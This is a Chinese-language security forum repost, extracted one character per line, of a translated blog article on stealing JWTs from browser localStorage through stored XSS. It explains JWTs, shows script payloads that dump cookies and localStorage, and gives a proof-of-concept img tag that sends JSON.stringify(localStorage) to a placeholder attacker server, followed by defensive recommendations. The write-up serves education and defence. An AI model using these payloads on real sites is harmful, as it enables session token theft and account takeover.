论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[693] 2019-09-23_通过XSS窃取localStorage中的JWT
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-16
Web安全
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2019-09-23_通过XSS窃取localStorage中的JWT
通
过
X
S
S
窃
取
l
o
c
a
l
S
t
o
r
a
g
e
中
的
J
W
T
A
r
k
T
e
a
m
A
r
k
T
e
a
m
2
0
1
9
-
0
9
-
2
3
作
者
:
{
W
X
L
}
@
A
r
k
T
e
a
m
原
文
作
者
:
D
a
v
i
d
R
o
c
c
a
s
a
l
v
a
原
文
题
目
:
S
t
e
a
l
i
n
g
J
W
T
s
i
n
l
o
c
a
l
S
t
o
r
a
g
e
v
i
a
X
S
S
原
文
来
源
:
D
a
v
i
d
R
o
c
c
a
s
a
l
v
a
’
s
b
l
o
g
“
S
t
e
a
l
i
n
g
J
W
T
s
i
n
l
o
c
a
l
S
t
o
r
a
g
e
v
i
a
X
S
S
”
由
于
很
多
现
代
应
用
程
序
都
在
使
用
J
S
O
N
W
e
b
令
牌
(
J
W
T
)
来
管
理
用
户
会
话
,
如
果
J
W
T
发
生
泄
露
将
会
导
致
严
重
的
后
果
。
下
面
将
简
要
介
绍
J
W
T
的
概
念
,
以
及
作
者
的
窃
取
示
例
以
及
J
W
T
的
保
护
措
施
。
一
、
什
么
是
一
、
什
么
是
J
S
O
N
W
e
b
令
牌
(
令
牌
(
J
W
T
)
?
)
?
简
而
言
之
,
J
W
T
是
一
个
J
S
O
N
W
e
b
令
牌
。
这
是
一
种
系
统
对
用
户
进
行
身
份
验
证
的
简
单
方
法
,
可
以
基
于
开
源
库
很
轻
松
的
实
现
。
因
为
J
W
T
只
是
U
R
L
安
全
字
符
串
,
所
以
它
们
很
容
易
通
过
U
R
L
参
数
等
传
递
。
J
W
T
由
三
个
由
单
个
点
分
隔
的
组
件
组
成
:
h
e
a
d
e
r
.
p
a
y
l
o
a
d
.
s
i
g
n
a
t
u
r
e
。
在
大
多
数
配
置
中
,
一
旦
用
户
提
供
有
效
凭
证
,
此
令
牌
就
会
在
H
T
T
P
标
头
中
设
置
并
用
于
持
续
授
权
,
类
似
于
标
准
会
话
c
o
o
k
i
e
。
虽
然
J
W
T
与
传
统
的
c
o
o
k
i
e
有
些
相
似
之
处
,
但
是
J
W
T
不
能
通
过
攻
击
c
o
o
k
i
e
的
方
法
来
破
坏
。
二
、
通
过
二
、
通
过
X
S
S
窃
取
窃
取
l
o
c
a
l
S
t
o
r
a
g
e
中
的
中
的
J
W
T
的
示
例
的
示
例
文
中
作
者
发
现
了
一
个
存
储
的
X
S
S
漏
洞
,
该
漏
洞
使
用
了
J
W
T
进
行
身
份
验
证
。
一
旦
设
置
了
有
效
载
荷
,
访
问
该
网
页
的
任
何
受
害
者
都
会
将
J
W
T
发
送
给
攻
击
者
。
由
于
每
个
J
W
T
都
存
储
有
唯
一
的
标
识
符
/
键
,
因
此
无
法
在
不
知
道
此
信
息
的
情
况
下
调
用
J
W
T
。
在
J
a
v
a
S
c
r
i
p
t
警
告
框
中
呈
现
标
准
c
o
o
k
i
e
(
无
保
护
)
的
典
型
方
法
是
:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
<
/
s
c
r
i
p
t
>
但
是
由
于
l
o
c
a
l
S
t
o
r
a
g
e
中
的
数
据
以
数
组
的
形
式
存
储
,
因
此
无
法
使
用
类
似
的
方
法
调
用
:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
l
o
c
a
l
S
t
o
r
a
g
e
)
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
l
o
c
a
l
S
t
o
r
a
g
e
)
<
/
s
c
r
i
p
t
>
图
1
l
o
c
a
l
S
t
o
r
a
g
e
警
告
框
因
此
对
l
o
c
a
l
S
t
o
r
a
g
e
或
s
e
s
s
i
o
n
S
t
o
r
a
g
e
中
的
数
据
执
行
此
操
作
的
一
种
方
法
是
使
用
g
e
t
I
t
e
m
(
)
方
法
检
索
每
个
项
目
。
<
s
c
r
i
p
t
>
a
l
e
r
t
(
l
o
c
a
l
S
t
o
r
a
g
e
.
g
e
t
I
t
e
m
(
‘
k
e
y
’
)
)
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
l
o
c
a
l
S
t
o
r
a
g
e
.
g
e
t
I
t
e
m
(
‘
k
e
y
’
)
)
<
/
s
c
r
i
p
t
>
例
:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
l
o
c
a
l
S
t
o
r
a
g
e
.
g
e
t
I
t
e
m
(
‘
S
e
r
v
i
c
e
P
r
o
v
i
d
e
r
.
k
d
c
i
a
a
s
d
k
f
a
e
a
n
f
a
e
g
f
p
e
2
3
.
u
s
e
r
n
a
m
e
@
c
o
m
p
a
n
y
.
c
o
m
.
a
c
c
e
s
s
T
o
k
e
n
’
)
)
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
l
o
c
a
l
S
t
o
r
a
g
e
.
g
e
t
I
t
e
m
(
‘
S
e
r
v
i
c
e
P
r
o
v
i
d
e
r
.
k
d
c
i
a
a
s
d
k
f
a
e
a
n
f
a
e
g
f
p
e
2
3
.
u
s
e
r
n
a
m
e
@
c
o
m
p
a
n
y
.
c
o
m
.
a
c
c
e
s
s
T
o
k
e
n
’
)
)
<
/
s
c
r
i
p
t
>
图
2
J
W
T
的
a
c
c
e
s
s
T
o
k
e
n
展
示
但
是
进
行
上
述
操
作
需
要
知
道
唯
一
的
标
识
符
’
k
e
y
‘
,
如
下
所
示
:
图
3
存
储
在
l
o
c
a
l
S
t
o
r
a
g
e
中
的
密
钥
示
例
列
表
可
以
通
过
暴
力
破
解
这
个
唯
一
的
标
识
符
,
或
者
编
写
J
a
v
a
S
c
r
i
p
t
来
迭
代
l
o
c
a
l
S
t
o
r
a
g
e
中
的
每
个
项
目
。
其
中
J
S
O
N
.
S
t
r
i
n
g
i
f
y
是
一
个
好
的
方
法
用
来
破
解
这
个
标
识
符
。
它
可
以
将
所
有
的
l
o
c
a
l
S
t
o
r
a
g
e
内
容
转
换
为
字
符
串
并
破
解
这
个
标
识
符
,
例
如
:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
l
o
c
a
l
S
t
o
r
a
g
e
)
)
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
a
l
e
r
t
(
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
l
o
c
a
l
S
t
o
r
a
g
e
)
)
<
/
s
c
r
i
p
t
>
图
4
l
o
c
a
l
S
t
o
r
a
g
e
内
容
转
换
为
字
符
串
用
于
窃
取
J
W
T
的
完
整
X
S
S
P
o
C
将
如
下
所
示
:
<
i
m
g
s
r
c
=
’
h
t
t
p
s
:
/
/
<
a
t
t
a
c
k
e
r
-
s
e
r
v
e
r
>
/
y
i
k
e
s
?
j
w
t
=
’
+
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
l
o
c
a
l
S
t
o
r
a
g
e
)
;
’
-
-
!
>
<
i
m
g
s
r
c
=
’
h
t
t
p
s
:
/
/
<
a
t
t
a
c
k
e
r
-
s
e
r
v
e
r
>
/
y
i
k
e
s
?
j
w
t
=
’
+
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
l
o
c
a
l
S
t
o
r
a
g
e
)
;
’
-
-
!
>
图
5
通
过
X
S
S
漏
洞
披
露
并
发
送
到
攻
击
者
控
制
的
服
务
器
的
J
W
T
示
例
要
实
现
这
个
攻
击
需
要
I
d
T
o
k
e
n
,
a
c
c
e
s
s
T
o
k
e
n
和
许
多
其
他
相
关
令
牌
。
其
中
I
d
T
o
k
e
n
用
于
验
证
和
伪
装
成
有
问
题
的
用
户
(
实
质
上
是
帐
户
接
管
)
,
a
c
c
e
s
s
T
o
k
e
n
可
用
于
生
成
带
有
身
份
验
证
的
全
新
I
d
T
o
k
e
n
。
这
里
最
大
的
问
题
是
缺
乏
将
传
统
c
o
o
k
i
e
安
全
标
志
应
用
于
l
o
c
a
l
S
t
o
r
a
g
e
中
存
储
的
项
目
的
能
力
。
三
、
保
护
措
施
三
、
保
护
措
施
可
以
通
过
使
用
传
统
的
c
o
o
k
i
e
保
护
来
加
强
J
W
T
的
安
全
性
。
切
勿
在
l
o
c
a
l
S
t
o
r
a
g
e
中
存
储
任
何
敏
感
内
容
,
例
如
J
W
T
或
任
何
其
他
凭
据
。
考
虑
在
授
权
标
头
上
使
用
c
o
o
k
i
e
标
头
。
设
置
C
o
o
k
i
e
标
头
保
护
。
切
勿
在
屏
幕
上
,
U
R
L
和
/
或
源
代
码
中
呈
现
令
牌
。
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全